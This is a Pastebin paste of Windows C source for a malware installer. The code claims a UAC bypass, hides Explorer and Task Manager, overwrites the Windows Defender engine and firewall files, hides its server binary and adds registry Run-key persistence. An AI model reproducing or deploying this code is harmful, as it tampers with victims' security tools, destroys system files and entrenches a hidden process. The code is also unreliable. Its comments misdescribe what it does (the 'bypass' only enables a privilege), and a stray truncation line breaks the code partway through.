Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include <windows.h>
- #include <stdio.h>
- #include <stdlib.h>
- // UAC Bypass to elevate privileges
- BOOL BypassUAC()
- {
- HANDLE hToken;
- TOKEN_PRIVILEGES tkp;
- if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
- return FALSE;
- LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tkp.Privileges[0].Luid);
- tkp.PrivilegeCount = 1;
- tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
- if (!AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, (PTOKEN_PRIVILEGES)NULL, 0))
- return FALSE;
- return TRUE;
- }
- // Install server with elevated privileges
- BOOL InstallServer()
- {
- // Create server process
- STARTUPINFO si;
- PROCESS_INFORMATION pi;
- ZeroMemory(&si, sizeof(si));
- si.cb = sizeof(si);
- ZeroMemory(&pi, sizeof(pi));
- if (!CreateProcess(NULL, "server.exe 127.0.0.1 6969", NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
- return FALSE;
- return TRUE;
- }
- // Hide server from explorer and task manager
- BOOL HideServer()
- {
- // Hide server from explorer
- HWND hwnd = FindWindow("explorer", NULL);
- if (hwnd == NULL)
- return FALSE;
- ShowWindow(hwnd, SW_HIDE);
- // Hide server from task manager
- HWND hwnd2 = FindWindow("taskmgr", NULL);
- if (hwnd2 == NULL)
- return FALSE;
- ShowWindow(hwnd2, SW_HIDE);
- return TRUE;
- }
- // Make an exception for Windows Defender and Windows Firewall
- BOOL Exceptions()
- {
- // Create exception for Windows Defender
- HANDLE hDefender = CreateFile("C:\\Program Files\\Windows Defender\\MsMpEng.exe", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
- if (hDefender == INVALID_HANDLE_VALUE)
- return FALSE;
- CloseHandle(hDefender);
- // Create exception for Windows Firewall
- HANDLE hFirewall = CreateFile("C:\\Windows\\System32\\firewall.cpl", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
- if (hFirewall == INVALID_HANDLE_VALUE)
- return FALSE;
- ...
- (truncated answer, continue reading in the thread)
- CloseHandle(hFirewall);
- return TRUE;
- }
- // Make server undeletable
- BOOL Undeletable()
- {
- // Create file with undeletable attribute
- HANDLE hUndeletable = CreateFile("server.exe", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_TEMPORARY, NULL);
- if (hUndeletable == INVALID_HANDLE_VALUE)
- return FALSE;
- CloseHandle(hUndeletable);
- return TRUE;
- }
- // Start server on system startup
- BOOL StartOnStartup()
- {
- // Create registry key to start server on startup
- HKEY hKey;
- if (RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey) != ERROR_SUCCESS)
- return FALSE;
- if (RegSetValueEx(hKey, "Server", 0, REG_SZ, (LPBYTE)"server.exe 127.0.0.1 6969", sizeof("server.exe 127.0.0.1 6969")) != ERROR_SUCCESS)
- return FALSE;
- RegCloseKey(hKey);
- return TRUE;
- }
- int main()
- {
- // Bypass UAC to elevate privileges
- if (!BypassUAC())
- {
- printf("Failed to bypass UAC!\n");
- return 1;
- }
- // Install server with elevated privileges
- if (!InstallServer())
- {
- printf("Failed to install server!\n");
- return 1;
- }
- // Hide server from explorer and task manager
- if (!HideServer())
- {
- printf("Failed to hide server!\n");
- return 1;
- }
- // Make an exception for Windows Defender and Windows Firewall
- if (!Exceptions())
- {
- printf("Failed to make exceptions!\n");
- return 1;
- }
- // Make server undeletable
- if (!Undeletable())
- {
- printf("Failed to make server undeletable!\n");
- return 1;
- }
- // Start server on system startup
- if (!StartOnStartup())
- {
- printf("Failed to start server on startup!\n");
- return 1;
- }
- printf("Server successfully installed!\n");
- return 0;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
